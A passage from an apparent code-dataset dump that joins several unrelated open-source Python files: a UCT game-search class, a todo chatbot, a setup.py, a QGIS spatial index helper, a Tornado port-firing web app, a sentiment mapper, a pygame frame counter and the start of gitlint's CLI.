'message': self.board.to_json_action(legal[0]),
'extras': self.data.copy(),
}
games = 0
begin = time.time()
while time.time() - begin < self.calculation_time:
self.run_simulation()
games += 1
# Display the number of calls of `run_simulation` and the
# time elapsed.
self.data.update(games=games, max_depth=self.max_depth,
time=str(time.time() - begin))
print(self.data['games'], self.data['time'])
print("Maximum depth searched:", self.max_depth)
# Store and display the stats for each possible action.
self.data['actions'] = self.calculate_action_values(self.history, player, legal)
for m in self.data['actions']:
print(self.action_template.format(**m))
# Return the action with the highest average value.
return {
'type': 'action',
'message': self.board.to_json_action(self.data['actions'][0]['action']),
'extras': self.data.copy(),
}
def run_simulation(self):
# Plays out a "random" game from the current position,
# then updates the statistics tables with the result.
# A bit of an optimization here, so we have a local
# variable lookup instead of an attribute access each loop.
C, stats = self.C, self.stats
visited_states = []
history_copy = self.history[:]
state = history_copy[-1]
expand = True
for t in range(1, self.max_actions + 1):
legal = self.board.legal_actions(state)
actions_states = [(a, self.board.next_state(history_copy, a)) for a in legal]
if expand and not all(S in stats for a, S in actions_states):
stats.update((S, Stat()) for a, S in actions_states if S not in stats)
expand = False
if t > self.max_depth:
self.max_depth = t
if expand:
# If we have stats on all of the legal actions here, use UCB1.
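                # UCB1 balances exploitation (the average value so far) against
                # exploration: the C * sqrt(log(total visits) / visits) bonus
                # favors rarely-tried actions, and the `or 1` terms guard
                # against division by zero for unvisited states.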
actions_states = [(a, S, stats[S]) for a, S in actions_states]
log_total = log(sum(e.visits for a, S, e in actions_states) or 1)
values_actions = [
(a, S, (e.value / (e.visits or 1)) + C * sqrt(log_total / (e.visits or 1)))
for a, S, e in actions_states
]
max_value = max(v for _, _, v in values_actions)
# Filter down to only those actions with maximum value under UCB1.
actions_states = [(a, S) for a, S, v in values_actions if v == max_value]
action, state = choice(actions_states)
visited_states.append(state)
history_copy.append(state)
if self.board.is_ended(state):
break
# Back-propagation
end_values = self.end_values(state)
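        # Each visited state is credited to the player whose move produced it
        # (previous_player), using the values of the finished play-out.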
for state in visited_states:
if state not in stats:
continue
S = stats[state]
S.visits += 1
S.value += end_values[self.board.previous_player(state)]
class UCTWins(UCT):
name = "jrb.mcts.uct"
action_template = "{action}: {percent:.2f}% ({wins} / {plays})"
def __init__(self, board, **kwargs):
super(UCTWins, self).__init__(board, **kwargs)
self.end_values = board.win_values
def calculate_action_values(self, history, player, legal):
actions_states = ((a, self.board.next_state(history, a)) for a in legal)
return sorted(
({'action': a,
'percent': 100 * self.stats[S].value / (self.stats[S].visits or 1),
'wins': self.stats[S].value,
'plays': self.stats[S].visits}
for a, S in actions_states),
key=lambda x: (x['percent'], x['plays']),
reverse=True
)
class UCTValues(UCT):
name = "jrb.mcts.uctv"
action_template = "{action}: {average:.1f} ({sum} / {plays})"
def __init__(self, board, **kwargs):
super(UCTValues, self).__init__(board, **kwargs)
self.end_values = board.points_values
def calculate_action_values(self, history, player, legal):
actions_states = ((a, self.board.next_state(history, a)) for a in legal)
return sorted(
({'action': a,
'average': self.stats[S].value / (self.stats[S].visits or 1),
'sum': self.stats[S].value,
'plays': self.stats[S].visits}
for a, S in actions_states),
key=lambda x: (x['average'], x['plays']),
reverse=True
)
| mit | 3,440,120,661,568,870,400 | 34.637838 | 95 | 0.556348 | false | 3.819815 | false | false | false |
botstory/todo-bot | todo/stories.py | 1 | 18715 | from botstory.ast import story_context
from botstory.middlewares import any, option, sticker, text
from bson.objectid import ObjectId
import datetime
import emoji
import logging
import os
import random
import re
from todo import orm, pagination_list, reflection
from todo.lists import lists_document
from todo.tasks import \
task_creation_stories, \
task_details_renderer, \
task_state_stories, \
task_story_helper, \
tasks_document
logger = logging.getLogger(__name__)
logger.debug('parse stories')
SHORT_HELP = 'Short Help:\n' \
'===========\n' \
'\n' \
':white_check_mark: Please give me few names of tasks (command: add new task)\n' \
':white_check_mark: In any time when you work with your task you can change its status ' \
'from open :arrow_right: in progress :arrow_right: done ' \
'(commands: start, stop, done, reopen)\n' \
':white_check_mark: list all your tasks (command: list)\n' \
':white_check_mark: details about task (command: last details)\n' \
':white_check_mark: work with last task (command: start last, stop last, done last, ' \
'reopen last, last task, remove last)\n' \
':white_check_mark: change all tasks at once (commands: start all, stop all, ' \
'done all, reopen all, remove all)\n' \
'\n' \
'All my source could be found here:\n' \
'https://github.com/botstory/todo-bot/, feedback and PRs are welcomed!'
SHORT_HELP_EMOJI = emoji.emojize(SHORT_HELP, use_aliases=True)
def setup(story):
pagination_list.setup(story)
task_state_stories.setup(story)
@story.on_start()
def on_start_story():
"""
User just pressed `get started` button so we can greet him
"""
@story.part()
async def greetings(message):
logger.info('greetings')
await story.say('Nice to see you here!\n'
'My goal is to help you with your list of tasks.',
user=message['user'])
await story.say(SHORT_HELP_EMOJI,
user=message['user'])
await story.ask('let\'s begin!',
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}],
user=message['user'])
@story.on(text.text.EqualCaseIgnore('all'))
def list_of_lists_story():
@story.part()
async def show_list_of_stories(ctx):
logger.info('list of tasks')
# TODO: remove return solve one test, but why?
return await pagination_list.pagination_loop(
list_title='All lists:',
target_document=reflection.class_to_str(lists_document.ListDocument),
title_field='name',
page_length=os.environ.get('LIST_PAGE_LENGTH', 4),
**ctx,
)
@story.on([
option.Equal('LIST_TASKS_NEW_FIRST'),
text.Match('^list(( all)? tasks)?', flags=re.IGNORECASE),
text.EqualCaseIgnore('todo'),
])
def list_of_tasks_story():
@story.part()
async def list_of_tasks(ctx):
logger.info('list of tasks')
# TODO: should filter the last one
return await pagination_list.pagination_loop(
ctx,
subtitle_renderer=reflection.class_to_str(tasks_document.task_details_renderer),
list_title='List of actual tasks:',
list_type='template',
page_length=os.environ.get('LIST_PAGE_LENGTH', 4),
target_document=reflection.class_to_str(tasks_document.TaskDocument),
title_field='description',
)
@story.on(text.text.EqualCaseIgnore('new list'))
def new_list_tasks_story():
@story.part()
async def ask_name(message):
logger.info('new list')
return await story.ask(
'You are about to create new list of tasks.\nWhat is the name of it?',
user=message['user'],
)
@story.part()
async def create_list(ctx):
logger.info('create list')
list_name = text.get_raw_text(ctx)
new_list = await lists_document.ListDocument(**{
'user_id': ctx['user']['_id'],
'name': list_name,
'created_at': datetime.datetime.now(),
'updated_at': datetime.datetime.now(),
}).save()
await story.say('You\'ve just created list of tasks: '
'`{}`.\n'
'Now you can add tasks to it.'.format(list_name), user=ctx['user'])
@story.on([
option.Equal('REMOVE_LAST_TASK'),
text.Match('delete last', flags=re.IGNORECASE),
text.Match('drop last', flags=re.IGNORECASE),
text.Match('forget about last', flags=re.IGNORECASE),
text.Match('kill last', flags=re.IGNORECASE),
text.Match('remove (last|next)', flags=re.IGNORECASE),
])
def remove_last_task_story():
@story.part()
async def remove_last_task(ctx):
logger.info('remove last task')
try:
last_task = await task_story_helper.last_task(ctx)
desc = last_task.description
logger.debug('going to remove task `{}`'.format(desc))
await tasks_document.TaskDocument.objects({
'_id': last_task._id,
}).delete_one()
msg = emoji.emojize(':ok: task `{}` was removed'.format(desc), use_aliases=True)
logger.info(msg)
await story.ask(msg,
quick_replies=[{
'title': 'remove next',
'payload': 'REMOVE_LAST_TASK',
}, {
'title': 'next details',
'payload': 'LAST_TASK_DETAILS',
}, {
'title': 'add task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list',
'payload': 'LIST_TASKS_NEW_FIRST',
},
],
user=ctx['user'])
except orm.errors.DoesNotExist:
logger.warning('user doesnt have tickets to remove')
await story.ask(emoji.emojize(
'You don\'t have any tickets yet.\n'
':information_source: Please send my few words about it and I will add it to your TODO list.',
use_aliases=True,
),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}],
user=ctx['user'],
)
@story.on(option.Match('REMOVE_TASK_(.+)'))
def remove_task_story():
@story.part()
async def try_to_remove_task(ctx):
task_id = story_context.get_message_data(ctx, 'option', 'matches')[0]
try:
task = await tasks_document.TaskDocument.objects.find_one({
'_id': ObjectId(task_id),
})
await tasks_document.TaskDocument.objects({
'_id': task._id,
}).delete_one()
await story.ask(emoji.emojize(':ok: Task `{}` was deleted', use_aliases=True).format(task.description),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
},
],
user=ctx['user'])
except orm.errors.DoesNotExist:
await story.ask(emoji.emojize(':confused: Can\'t find task.\n'
'It seems that it was already removed.', use_aliases=True),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
},
],
user=ctx['user'])
@story.on([
option.Equal('REMOVE_ALL_TASKS'),
text.Match('delete all(?: tasks)?(?: jobs)?', flags=re.IGNORECASE),
text.Match('drop all(?: tasks)?', flags=re.IGNORECASE),
text.Match('forget all(?: tasks)?', flags=re.IGNORECASE),
text.Match('kill all(?: tasks)?', flags=re.IGNORECASE),
text.Match('remove all(?: tasks)?', flags=re.IGNORECASE),
])
def remove_all_tasks_story():
@story.part()
async def ask_whether_user_really_want_to_remove_all_tasks(ctx):
logger.info('ask whether remove all tasks or not')
return await story.ask(emoji.emojize(
':question: Do you really want to remove all your tasks '
'of current list?',
use_aliases=True,
), quick_replies=[{
'title': 'Sure, remove all!',
'payload': 'CONFIRM_REMOVE_ALL'
}, {
'title': 'Nope',
'payload': 'REFUSE_REMOVE_ALL'
}], user=ctx['user'])
@story.case([
option.Equal('CONFIRM_REMOVE_ALL'),
sticker.Like(),
text.Match('confirm', flags=re.IGNORECASE),
text.Match('ok', flags=re.IGNORECASE),
text.Match('(.*)remove(.*)', flags=re.IGNORECASE),
text.Match('sure(.*)', flags=re.IGNORECASE),
text.Match('yeah', flags=re.IGNORECASE),
text.Match('yes', flags=re.IGNORECASE),
])
def confirm_to_remove_all():
@story.part()
async def remove_all_tasks(ctx):
logger.info('remove all tasks')
tasks_count = await tasks_document.TaskDocument.objects({
'user_id': ctx['user']['_id'],
}).delete()
msg = emoji.emojize(':ok: {} tasks were removed'.format(tasks_count), use_aliases=True)
logger.info(msg)
await story.ask(msg,
quick_replies=[{
'title': 'remove next',
'payload': 'REMOVE_LAST_TASK',
}, {
'title': 'next details',
'payload': 'LAST_TASK_DETAILS',
}, {
'title': 'add task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list',
'payload': 'LIST_TASKS_NEW_FIRST',
},
],
user=ctx['user'])
@story.on([
text.Match('delete (.*)', flags=re.IGNORECASE),
text.Match('drop (.*)', flags=re.IGNORECASE),
text.Match('forget about (.*)', flags=re.IGNORECASE),
text.Match('kill (.*)', flags=re.IGNORECASE),
text.Match('remove (.*)', flags=re.IGNORECASE),
])
def remove_something_story():
"""
got request to remove something (list or task)
"""
@story.part()
async def remove_list_or_task(ctx):
logger.info('remove list or task')
target = story_context.get_message_data(ctx)['text']['matches'][0]
logger.info('target {}'.format(target))
logger.debug('try to remove task {}'.format(target))
count = await tasks_document.TaskDocument.objects({
'description': target,
'user_id': ctx['user']['_id'],
}).delete()
logger.info('remove {} lists'.format(count))
if count > 0:
await story.say(emoji.emojize(':ok: Task `{}` was removed'.format(target), use_aliases=True),
user=ctx['user'])
return
logger.debug('try to remove list {}'.format(target))
count = await lists_document.ListDocument.objects({
'name': target,
'user_id': ctx['user']['_id'],
}).delete()
logger.info('remove {} lists'.format(count))
if count > 0:
await story.say(emoji.emojize(':ok: List `{}` was removed'.format(target), use_aliases=True),
user=ctx['user'])
return
await story.say(emoji.emojize(':confused: We can\'t find `{}` what do you want to remove?'.format(target),
use_aliases=True),
user=ctx['user'])
@story.on([
text.Match('more about(.+)', flags=re.IGNORECASE),
text.Match('see(.+)', flags=re.IGNORECASE),
])
def task_details_story_by_text_match():
@story.part()
async def send_task_details(ctx):
query = story_context.get_message_data(ctx, 'text', 'matches')[0].strip()
try:
task = await tasks_document.TaskDocument.objects.find({
'description': query,
})
if len(task) == 1:
await task_details_renderer.render(story, ctx['user'], task[0])
else:
pass
# TODO:
except orm.errors.DoesNotExist:
# TODO:
pass
@story.on(option.Match('TASK_DETAILS_(.+)'))
def task_details_story_by_option_match():
@story.part()
async def send_task_details_back(ctx):
task_id = story_context.get_message_data(ctx, 'option', 'matches')[0]
try:
task = await tasks_document.TaskDocument.objects.find_one({
'_id': ObjectId(task_id),
})
await task_details_renderer.render(story, ctx['user'], task)
except orm.errors.DoesNotExist:
await story.ask(emoji.emojize(
':confused: Can\'t find task details.',
use_aliases=True),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
}],
user=ctx['user'])
@story.on([
option.Equal('LAST_TASK_DETAILS'),
text.Match('last(?: task)?', flags=re.IGNORECASE),
text.Match('next (details|task)', flags=re.IGNORECASE),
text.Match('^(task )?details', flags=re.IGNORECASE),
])
def last_task_story():
@story.part()
async def send_last_task_details(ctx):
try:
await task_details_renderer.render(story, ctx['user'],
task=await task_story_helper.last_task(ctx))
except orm.errors.DoesNotExist:
await story.ask('There is no last task yet. Please add few.',
user=ctx['user'],
quick_replies=[{
'title': 'Add New Task',
'payload': 'ADD_NEW_TASK'
}])
@story.on([
option.Equal('ABOUT_ME'),
text.Equal('?'),
text.Equal('/?'),
text.EqualCaseIgnore('-h'),
text.EqualCaseIgnore('--help'),
text.Match('help( me)?', flags=re.IGNORECASE),
text.EqualCaseIgnore('what can I do here?'),
])
def about_me_story():
@story.part()
async def say_about_me(ctx):
await story.ask(SHORT_HELP_EMOJI,
user=ctx['user'],
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
}])
@story.on(receive=sticker.Like())
def like_story():
@story.part()
async def test_message(ctx):
msgs = [':wink:', ':heart_eyes:', ':smirk:', ':wink:', 'Thanks!', 'I like you too!']
await story.ask(emoji.emojize(random.choice(msgs), use_aliases=True),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
}],
user=ctx['user'])
task_creation_stories.setup(story)
@story.on(receive=any.Any())
def any_story():
"""
And all the rest messages as well
"""
@story.part()
async def something_else(message):
logger.info('something_else')
await story.ask(
emoji.emojize(':confused: Sorry I don\'t know, how to react on such message yet.\n'
'Here are few things that you can do quickly',
use_aliases=True),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
}],
user=message['user'])
| mit | 8,795,261,198,113,121,000 | 41.24605 | 119 | 0.455196 | false | 4.503128 | false | false | false |
beni55/django-multiselectfield | setup.py | 2 | 1717 | # -*- coding: utf-8 -*-
# Copyright (c) 2012-2013 by Pablo Martín <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this programe. If not, see <http://www.gnu.org/licenses/>.
# Initial code got from http://djangosnippets.org/users/danielroseman/
import os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
setup(
name="django-multiselectfield",
version="0.1.2",
author="Pablo Martin",
author_email="[email protected]",
description="Django multiple select field",
long_description=(read('README.rst') + '\n\n' + read('CHANGES.rst')),
classifiers=[
'Development Status :: 4 - Beta',
'Framework :: Django',
'License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
license="LGPL 3",
keywords="django,multiple,select,field,choices",
url='https://github.com/goinnn/django-multiselectfield',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
)
| lgpl-3.0 | -8,189,555,984,192,985,000 | 36.304348 | 89 | 0.69697 | false | 3.763158 | false | false | false |
Gustry/GeoHealth | src/core/blurring/layer_index.py | 1 | 2584 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
GeoHealth
A QGIS plugin
-------------------
begin : 2014-08-20
copyright : (C) 2014 by Etienne Trimaille
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from builtins import object
from qgis.core import QgsSpatialIndex, QgsFeatureRequest, QgsGeometry, Qgis
class LayerIndex(object):
"""Check an intersection between a QgsGeometry and a QgsVectorLayer."""
def __init__(self, layer):
self.__layer = layer
if Qgis.QGIS_VERSION_INT >= 20700:
self.__index = QgsSpatialIndex(layer.getFeatures())
else:
self.__index = QgsSpatialIndex()
for ft in layer.getFeatures():
self.__index.insertFeature(ft)
def contains(self, point):
"""Return true if the point intersects the layer."""
intersects = self.__index.intersects(point.boundingBox())
for i in intersects:
request = QgsFeatureRequest().setFilterFid(i)
feat = next(self.__layer.getFeatures(request))
if point.intersects(QgsGeometry(feat.geometry())):
return True
return False
def count_intersection(self, buffer_geom, nb):
"""Return true if the buffer intersects enough entities."""
count = 0
intersects = self.__index.intersects(buffer_geom.boundingBox())
for i in intersects:
request = QgsFeatureRequest().setFilterFid(i)
feat = next(self.__layer.getFeatures(request))
if buffer_geom.intersects(QgsGeometry(feat.geometry())):
count += 1
if count >= nb:
return True
return False
| gpl-3.0 | -7,222,612,915,611,914,000 | 40.015873 | 77 | 0.458204 | false | 5.394572 | false | false | false |
thomaserlang/firing-system | web.py | 1 | 5483 | import logging
import tornado.ioloop
import tornado.web
import tornado.options
import tornado.websocket
import math
import os
import json
import constants
from decorators import new_cursor
class Web_handler(tornado.web.RequestHandler):
def get(self):
self.render(
'ports.html',
GROUPED_PORTS=constants.GROUPED_PORTS,
CONNECTIONS_PER_PORT=constants.CONNECTIONS_PER_PORT,
PORT_COLORS=constants.PORT_COLORS,
groups=self.groups(),
selected_group=self.selected_group(),
ports=json.dumps(self.ports()),
)
def ports(self):
group_id = self.get_argument('group_id', None)
if not group_id:
return []
with new_cursor() as c:
rows = c.execute(
'SELECT * FROM ports WHERE group_id=?',
(group_id,)
).fetchall()
data = []
for row in rows:
data.append({
'port': row['port'],
'connection': row['connection'],
'enabled': True if row['enabled'] == 'Y' else False,
'delay': row['delay'],
})
return data
def selected_group(self):
group_id = self.get_argument('group_id', None)
if not group_id:
return
return self.group_by_id(group_id)
def group_by_id(self, group_id):
with new_cursor() as c:
return c.execute(
'SELECT * FROM groups WHERE id=?',
(group_id,)
).fetchone()
def parse_delay(self, delay):
if not delay:
return 0
try:
return int(delay)
except ValueError:
return 0
def post(self):
name = self.get_argument('groupname')
if not name:
self.redirect('/')
return
with new_cursor() as c:
group = c.execute(
'SELECT * FROM groups WHERE name=?;', (name,)
).fetchone()
if group:
group_id = group['id']
else:
c.execute('INSERT INTO groups (name) VALUES (?);', (name,))
group_id = c.lastrowid
data = json.loads(self.get_argument('json'))
pdata = []
for d in data:
pdata.append(
(
group_id,
d['port'],
d['connection'],
'Y' if d['enabled'] else 'N',
self.parse_delay(d['delay']),
)
)
c.execute('DELETE FROM ports WHERE group_id=?;', (group_id,))
c.executemany(
'''
INSERT INTO ports
(group_id, port, connection, enabled, delay)
VALUES
(?, ?, ?, ?, ?)
''',
pdata
)
self.redirect('/?group_id={}'.format(group_id))
return
def groups(self):
with new_cursor() as c:
return c.execute(
'SELECT * FROM groups ORDER BY name ASC;'
).fetchall();
class Firing_progress_handler(tornado.websocket.WebSocketHandler):
clients = []
@classmethod
def send_message(cls, message):
for c in cls.clients:
c.write_message(message)
def open(self):
Firing_progress_handler.clients.append(self)
def on_message(self, message):
pass
def on_close(self):
Firing_progress_handler.clients.remove(self)
class Fire_handler(tornado.web.RequestHandler):
t = None
def get(self):
pass
def post(self):
import threading
import fire
cancel = self.get_argument('cancel', None)
if cancel:
fire.stop = True
return
if Fire_handler.t:
if Fire_handler.t.isAlive():
return
Fire_handler.t = threading.Thread(
target=fire.fire,
            args=(self.get_argument('group_id'),),  # one-element tuple, not a bare string
)
fire.stop = False
Fire_handler.t.daemon = True
Fire_handler.t.start()
def main():
    init_db(constants.DATABASE_FILE)
application = tornado.web.Application(
[
(r'/', Web_handler),
(r'/firing-progress', Firing_progress_handler),
(r'/fire', Fire_handler),
],
debug=True,
xsrf_cookies=False,
autoescape=None,
template_path=os.path.join(os.path.dirname(__file__), 'templates'),
static_path=os.path.join(os.path.dirname(__file__), 'static'),
)
application.listen(8000)
tornado.options.parse_command_line()
tornado.ioloop.IOLoop.instance().start()
def init_db(db_file):
with new_cursor() as c:
c.execute('''
CREATE TABLE IF NOT EXISTS groups (
id INTEGER PRIMARY KEY,
name TEXT
);
''')
c.execute('''
CREATE TABLE IF NOT EXISTS ports (
group_id INT NOT NULL,
port INT NOT NULL,
connection INT NOT NULL,
enabled TEXT,
delay INT DEFAULT 0,
PRIMARY KEY (group_id, port, connection)
);
''')
if __name__ == '__main__':
main() | mit | -4,520,526,623,585,199,600 | 27.712042 | 75 | 0.484406 | false | 4.457724 | false | false | false |
neuro-lyon/multiglom-model | src/script_fig_netw_freq.py | 1 | 3172 | # -*- coding:utf-8 -*-
"""
Script to see if the model is like the model of [1]_ by plotting the network
frequency against the oscillation rate.
References
----------
.. [1] Fourcaud-Trocmé, N., Courtiol, E., Buonviso, N., & Voegtlin, T. (2011).
Stability of fast oscillations in the mammalian olfactory bulb: experiments
and modeling. Journal of physiology, Paris, 105(1-3), 59–70.
doi:10.1016/j.jphysparis.2011.07.009
"""
import tables
import numpy as np
import matplotlib.pyplot as plt
from h5manager import get_all_attrs
def plot_netw_freq(db_filename, point_color, label):
"""Plot g_Ein0 against FFTMAX for the given DB."""
db = tables.openFile(db_filename) # Open the HDF5 database-like
# Get the interesting values
attrs_list = (('paramset', '_v_attrs', 'Input', 'g_Ein0'),
('results', '_v_attrs', 'FFTMAX', 0))
attrs = np.array(get_all_attrs(db, attrs_list))
# Put them on the figure
plt.plot(attrs[:, 0], attrs[:, 1], ' .', color=point_color, label=label)
plt.legend(loc="upper left")
# Finally, close the db
db.close()
def plot_freqs(db_filename, point_color, label):
"""Plot mitral firing rate against network frequency."""
db = tables.openFile(db_filename)
# Get the values and arrays
attrs_list = (('results', 'spikes_it'),
('results', '_v_attrs', 'FFTMAX', 0),
('paramset', '_v_attrs', 'Common'))
attrs = get_all_attrs(db, attrs_list)
ps_common = attrs[0][2]
n_mitral = ps_common['N_mitral']
simu_length = ps_common['simu_length']
burnin = ps_common['burnin']
# Compute the spiking rate for each simulation
sim_values = np.ndarray((len(attrs), 2))
for ind_simu, simu in enumerate(attrs):
spike_times = simu[0].read()[1]
sim_values[ind_simu][0] = get_spiking_rate(spike_times, n_mitral,
simu_length, burnin)
sim_values[ind_simu][1] = simu[1] # FFTMAX already computed
# Plot the values
plt.plot(sim_values[:, 0], sim_values[:, 1], ' .', color=point_color,
label=label)
plt.legend()
# Close the DB
db.close()
def get_spiking_rate(spike_times, n_mitral, simu_length, burnin):
"""Return the spiking rate for the whole population."""
time_mask = (spike_times > burnin)
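    # Rate = spikes emitted after the burn-in / (number of mitral cells * remaining time).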
return 1.*time_mask.sum()/(n_mitral*(simu_length - burnin))
def main():
# Get the data
filename_beta = "data/db40_beta_1pop_fig_netw_freq_multiproc.h5"
filename_gamma = "data/db40_gamma_1pop_fig_netw_freq.h5"
# Build network frequency figure
plt.figure()
plot_netw_freq(filename_beta, 'blue', "beta")
plot_netw_freq(filename_gamma, 'red', "gamma")
plt.xlabel("Input excitatory conductance $g_{Ein0}$ (S $m^{-2}$)")
plt.ylabel("Network frequency $f$ (Hz)")
# Build freq vs. freq figure
plt.figure()
plot_freqs(filename_beta, 'blue', "beta")
plot_freqs(filename_gamma, 'red', "gamma")
plt.xlabel("Mitral firing rate $\\nu_0$")
plt.ylabel("Network frequency $f$ (Hz)")
plt.show()
if __name__ == '__main__':
res = main()
| mit | 6,029,708,695,739,347,000 | 30.376238 | 78 | 0.613758 | false | 3.116028 | false | false | false |
sazlin/reTOracle | SA_Mapper.py | 1 | 3038 | #!/usr/bin/python
"""
Note: You can test SA_Mapper.py and sa_reducer.py by themselves
using the following line in the console:
cat sa_input | python SA_Mapper.py | sort | python sa_reducer.py
sa_input is an example input file created for S3 by SQ_Worker.py
"""
import json
import time
import sys
#from sentimentML.ML_builder import ML_builder
#from datum_box import box_tweet
from SentimentAnalysis import NB, LR
from sentimentML import ML_builder
# DBox = None
# Datum_Integers = {'positive': 1, 'neutral': 0, 'negative': -1}
SVM = None
def _setup_SVM():
global SVM
SVM = ML_builder.SVM_builder()
SVM.SVM_build()
def _setup_DatumBox():
pass
# global DBox
# Datum_api_key = os.getenv('DATUM')
# DBox = DatumBox(Datum_api_key)
def setup_SA():
_setup_SVM()
_setup_DatumBox()
def run_SA(tweet, ret_dict=None):
if not ret_dict:
ret_dict = {}
    ret_dict['tweet_id'] = tweet[0]
_run_LR_SA(tweet, ret_dict)
_run_NB_SA(tweet, ret_dict)
_run_SVM_SA(tweet, ret_dict)
_run_DatumBox(tweet, ret_dict)
return ret_dict
def _run_LR_SA(tweet, ret_dict):
t1 = time.time()
results, probs = LR.predict(tweet[1])
t2 = time.time()
ret_dict['LR_SENT'] = results
ret_dict['LR_NEG_PROB'] = probs[0]
ret_dict['LR_POS_PROB'] = probs[1]
ret_dict['LR_EXEC_TIME'] = t2 - t1
#do magic
return ret_dict
def _run_NB_SA(tweet, ret_dict):
t1 = time.time()
results, probs = NB.predict(tweet[1])
t2 = time.time()
ret_dict['NB_SENT'] = results
ret_dict['NB_NEG_PROB'] = probs[0]
ret_dict['NB_POS_PROB'] = probs[1]
ret_dict['NB_EXEC_TIME'] = t2 - t1
#do magic
return ret_dict
def _run_SVM_SA(tweet, ret_dict):
t1 = time.time()
result = SVM.Predict(tweet[1])
t2 = time.time()
ret_dict['SVM_SENT'] = result[0]
ret_dict['SVM_NEG_PROB'] = result[1][0]
ret_dict['SVM_POS_PROB'] = result[1][1]
ret_dict['SVM_EXEC_TIME'] = t2 - t1
# ret_dict['SVM_SENT'] = 1
# ret_dict['SVM_NEG_PROB'] = 0.3
# ret_dict['SVM_POS_PROB'] = 0.89
# ret_dict['SVM_EXEC_TIME'] = 0.424
#do magic
return ret_dict
def _run_DatumBox(tweet, ret_dict):
# t1 = time.time()
# result = box_tweet(tweet[1])
# t2 = time.time()
# ret_dict['DatumBox_SENT'] = result
# ret_dict['DatumBox_NEG_PROB'] = -1
# ret_dict['DatumBox_POS_PROB'] = -1
# ret_dict['DatumBox_EXEC_TIME'] = t2 - t1
ret_dict['DatumBox_SENT'] = -2
ret_dict['DatumBox_NEG_PROB'] = -1
ret_dict['DatumBox_POS_PROB'] = -1
ret_dict['DatumBox_EXEC_TIME'] = -1
#do magic
return ret_dict
def main(argv):
setup_SA()
for line in sys.stdin:
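        # Each stdin line is expected to be one JSON-encoded tweet record, as in
        # the map | sort | reduce pipeline shown in the module docstring.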
try:
tweet = json.loads(line)
except Exception:
pass # skip this tweet
else:
#do SA magics
delicious_payload = json.dumps(run_SA(tweet))
print delicious_payload.lower()
#print str(tweet[0]) + '\t' + '1'
if __name__ == "__main__":
main(sys.argv)
| mit | 7,318,810,689,478,479,000 | 23.5 | 64 | 0.591178 | false | 2.826047 | false | false | false |
venthur/pyff | src/lib/vision_egg/util/frame_counter.py | 3 | 1500 | __copyright__ = """ Copyright (c) 2010-2011 Torsten Schmits
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
"""
import logging
import threading
import pygame
class FrameCounter(threading.Thread):
""" Runs a thread that calls flip() repeatedly, which waits for
vsync and thus indicates real display redraws. """
def __init__(self, flag):
threading.Thread.__init__(self)
self._flag = flag
self.frame = 0
self._locked_frame = 0
def run(self):
try:
while self._flag:
self.step()
except pygame.error as e:
logging.getLogger('FrameCounter').error(unicode(e))
def step(self):
self.sync()
self.frame += 1
def sync(self):
pygame.display.flip()
def lock(self):
self._locked_frame = self.frame
@property
def last_interval(self):
return self.frame - self._locked_frame
| gpl-2.0 | 8,166,437,170,635,239,000 | 29 | 71 | 0.67 | false | 4.237288 | false | false | false |
jorisroovers/gitlint | gitlint/cli.py | 1 | 19134 | # pylint: disable=bad-option-value,wrong-import-position
# We need to disable the import position checks because of the windows check that we need to do below
import copy
import logging
import os
import platform
import stat
import sys
import click
import gitlint
from gitlint.lint import GitLinter
from gitlint.config import LintConfigBuilder, LintConfigError, LintConfigGenerator
from gitlint.git import GitContext, GitContextError, git_version
from gitlint import hooks
from gitlint.shell import shell
from gitlint.utils import LOG_FORMAT
from gitlint.exception import GitlintError
# Error codes
MAX_VIOLATION_ERROR_CODE = 252
USAGE_ERROR_CODE = 253
GIT_CONTEXT_ERROR_CODE = 254
CONFIG_ERROR_CODE = 255
DEFAULT_CONFIG_FILE = ".gitlint"
# -n: disable swap files. This fixes a vim error on windows (E303: Unable to open swap file for <path>)
DEFAULT_COMMIT_MSG_EDITOR = "vim -n"
# Since we use the return code to denote the amount of errors, we need to change the default click usage error code
click.UsageError.exit_code = USAGE_ERROR_CODE
